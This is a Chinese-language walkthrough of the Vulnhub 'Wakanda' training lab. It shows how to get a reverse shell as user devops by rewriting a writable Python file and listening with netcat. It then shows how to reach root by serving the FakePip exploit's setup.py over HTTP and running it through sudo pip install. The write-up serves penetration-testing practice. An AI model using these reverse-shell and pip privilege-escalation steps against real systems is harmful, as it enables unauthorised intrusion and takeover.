滲透測試實戰-Vulnhub-Wakanda

Wakanda Vulhub - 幕布php

Wakanda Vulhub
 
  • 接下來能夠有兩種方式獲得devops的權限,一種是利用存在的python文件,利用編程,還有一種是利用msfvenom生成payload,將其放入原來的py文件,註釋掉原來的代碼,後面的偵聽過程都是一致的
  • 第一種
    • 由此,看出這個文件的所屬是devops,屬組是developers,任何人都能修改,能夠進行修改做爲一個反向shell
      • 這裏應該是socket編程,讓它與攻擊機的1235端口有鏈接
      • 而後在kali上偵聽該端口,nc -lvvp 1235
        • 成功進入devops的shell
  • 想辦法提權
    • 查看devops的root權限,發如今nopass的狀況下只有pip可使用
      • sudo -l命令
    • 關於pip命令,有一個漏洞能夠利用,GitHub上有一個利用腳本Fakepip https://github.com/0x00-0x00/FakePip
    • 利用pip升級漏洞
      • 進行修改,主要是IP,監聽的端口能夠自行選擇是否修改,但必定與後面監聽的端口一致
        • 如圖,默認的端口是 13372
      • 而後在當前的目錄下利用python開啓一個簡單的http服務,提供靶機下載,python -m SimpleHTTPServer 8888
        • 而後在靶機上,wget http:192.168.56.103:8888/setup.py
      • 而後在靶機上使用root權限執行sudo /usr/bin/pip install . --upgrade --force-reinstall 執行這個EXp
      • 得到root權限後,查看根目錄,獲得最後一個flag
  • 至此找到了全部的flag 並得到了root權限




以上內容整理於
幕布
相關文章
相關標籤/搜索